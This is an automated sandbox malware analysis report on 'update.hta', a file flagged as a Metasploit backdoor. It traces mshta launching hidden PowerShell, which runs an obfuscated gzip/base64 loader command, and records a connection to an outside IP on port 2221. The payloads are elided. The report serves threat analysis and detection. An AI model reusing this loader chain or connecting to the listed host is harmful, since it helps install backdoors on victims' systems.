Malware Analysis Report

2024-09-23 04:05

Sample ID 240619-1t7m1atcrc
Target update.hta
SHA256 3e32fa64ce2ccb3e071423c424ac845cb162cb2b749de4084220f4f9155317b6
Tags
metasploit backdoor execution trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK Matrix

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

3e32fa64ce2ccb3e071423c424ac845cb162cb2b749de4084220f4f9155317b6

Threat Level: Known bad

The file update.hta was found to be: Known bad.

Malicious Activity Summary

metasploit backdoor execution trojan

MetaSploit

Blocklisted process makes network request

Command and Scripting Interpreter: PowerShell

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

MITRE ATT&CK Matrix V13

Analysis: static1

Detonation Overview

Reported

2024-06-19 21:57

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-06-19 21:57

Reported

2024-06-19 22:07

Platform

win11-20240508-en

Max time kernel

489s

Max time network

498s

Command Line

C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\update.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}

Signatures

MetaSploit

trojan backdoor metasploit

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Enumerates physical storage devices

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\SysWOW64\mshta.exe

C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\update.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -w hidden -e [base64-encoded command elided; decoded form shown in the next process entry]

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" -nop -w hidden -c &([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String((('[gzip-compressed base64 payload elided]')-f'=','z','G')))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))

Network

Country Destination Domain Proto
TR 94.156.8.243:2221 tcp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp

Files

memory/4508-0-0x000000007139E000-0x000000007139F000-memory.dmp

memory/4508-1-0x0000000003130000-0x0000000003166000-memory.dmp

memory/4508-2-0x0000000005B40000-0x000000000616A000-memory.dmp

memory/4508-3-0x0000000071390000-0x0000000071B41000-memory.dmp

memory/4508-4-0x0000000005880000-0x00000000058A2000-memory.dmp

memory/4508-5-0x0000000071390000-0x0000000071B41000-memory.dmp

memory/4508-7-0x0000000005A50000-0x0000000005AB6000-memory.dmp

memory/4508-6-0x00000000059E0000-0x0000000005A46000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_id02vxib.51c.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4508-16-0x0000000006170000-0x00000000064C7000-memory.dmp

memory/4508-17-0x00000000065E0000-0x00000000065FE000-memory.dmp

memory/4508-18-0x0000000006690000-0x00000000066DC000-memory.dmp

memory/4508-19-0x0000000007F30000-0x00000000085AA000-memory.dmp

memory/4508-20-0x0000000006B30000-0x0000000006B4A000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

MD5 c0636f2d138baca01dbb2eedb99bf3d5
SHA1 3b927899db0f3e2cb510782592887dc02fc3e400
SHA256 10973e727e5b0eb3f12aba60a682d66e79dfd86e4b6cfc454fd8df70c6e1fa8a
SHA512 0187a6ccb6428fb24ad4bc4ca14e7ce6f40ae6ca4f352f8e86a15288deb05cb4dd317ef8e9d04dc9ffb24407ecf0924af2c7910830c79366f7e4e48cb4b82b1d

memory/4508-24-0x0000000071390000-0x0000000071B41000-memory.dmp

memory/4004-25-0x0000000005A20000-0x0000000005D77000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 d8fa24363a7d3592d0f6c4c6bf17da4c
SHA1 90df2df5d34d62640c3b24a5b09f305ba00c8359
SHA256 3e66e0f73a2d6e01ed51ca1ab4fae77b881cbe8e17583e5c1db7a6b6102e6230
SHA512 5f51c66e72cde65315eccdf10df0f269ae6c648322780445dd5153fa46020a76e1fcb3b5b53a9ef88b252e0d0e2966a5c4dfb77fd46d810a6615fc76bba38ab3

memory/4004-35-0x00000000064B0000-0x00000000064FC000-memory.dmp

memory/4004-36-0x0000000005D90000-0x0000000005D91000-memory.dmp